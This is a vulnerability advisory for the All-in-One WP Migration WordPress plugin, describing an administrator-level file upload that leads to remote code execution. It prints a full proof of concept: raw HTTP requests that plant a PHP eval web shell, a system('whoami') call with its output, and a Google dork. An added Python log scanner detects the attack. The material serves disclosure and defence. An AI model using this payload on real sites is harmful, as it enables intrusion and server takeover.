WordPress Plugin Vulnerabilities

All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE

Description

The plugin does not validate the extension of uploaded files, which allows administrators to upload PHP files to their site, even on multisite installations.

Proof of Concept

To reproduce:
- Log in, then open All-in-One WP Migration > Import and use the "Import from file" function.
- Intercept the wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 request.
- Change the "upload-file", "storage" and "archive" parameters: insert malicious PHP code into "upload-file" and submit the request.
- Access the URL below to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]

# Exploit Title:  WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution
# Google Dork: inurl:/wp-admin/admin-ajax.php
# Date: 23/12/2020
# Exploit Author: YICHENGLIU_chenfeng lab
# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/
# Version: All-in-One WP Migration <=7.38
# Tested on: Windows 10 (x64)
# Data in HTTP request:

POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797
Content-Length: 740
Origin: http://192.168.9.240
Connection: close
Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799

-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="upload-file"; filename="shell.wpress"
Content-Type: application/octet-stream

<?php eval($_POST['c']);
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="priority"

5
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="secret_key"

7wD1bP6YC4xB
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="storage"

shell
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="archive"

shell.php
-----------------------------3937767834299093780715813797--

##########################
execute shell
##########################
POST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

c=system('whoami');

###########################
Execute response
###########################
HTTP/1.1 200 OK
Date: Fri, 19 Mar 2021 09:00:56 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.27
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1124

desktop-psag0ka\gongfang-9
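Detection logic for the behaviour described above, as an added example that is not part of the advisory or of the plugin: it parses constructed Apache combined-format log lines (sample data, not taken from the page), flags POSTs to admin-ajax.php with action=ai1wm_import, and flags any request for a script extension under the plugin's storage directory, which only ever holds .wpress archives when extensions are validated. The is_allowed_import_name helper is an assumed allowlist check of the kind the advisory says is missing, not the vendor's fix.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (Apache combined format); the host/path values echo the advisory's PoC.
SAMPLE_LOG = """\
192.168.9.240 - - [19/Mar/2021:09:00:10 +0000] "POST /wordpresscn/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.9.240 - - [19/Mar/2021:09:00:56 +0000] "POST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1" 200 1124 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Mar/2021:09:01:02 +0000] "GET /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/backup/site.wpress HTTP/1.1" 200 9 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Mar/2021:09:02:00 +0000] "GET /wordpresscn/index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
STORAGE_DIR = "/wp-content/plugins/all-in-one-wp-migration/storage/"
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")  # assumed list of server-executed extensions


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Label one parsed entry: import upload, script fetched from storage, or None."""
    url = urlsplit(entry["target"])
    path = url.path.lower()
    if path.endswith("/wp-admin/admin-ajax.php") and entry["method"] == "POST":
        if parse_qs(url.query).get("action", [""])[0] == "ai1wm_import":
            return "ai1wm_import_upload"
    # Subdirectory installs are handled by searching for the plugin path anywhere in the URL path.
    if STORAGE_DIR in path and path.endswith(SCRIPT_EXTS):
        return "script_in_storage_dir"
    return None


def scan(log_text):
    """Return (ip, timestamp, label, target) for every suspicious entry, in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["ip"], entry["ts"], label, entry["target"]))
    return findings


def is_allowed_import_name(name):
    """Assumed hardening: accept only a bare *.wpress filename, no path separators or traversal."""
    return re.fullmatch(r"[A-Za-z0-9._-]+\.wpress", name) is not None and ".." not in name
```

On a real server, the second finding (a 200 response for a .php file under storage/) is the high-confidence signal; the import POST alone is normal administrator activity.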

Miscellaneous

Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU_chenfeng lab
Verified
Yes

Timeline

Publicly Published
2022-02-07
Added
2022-02-07
Last Updated
2022-04-13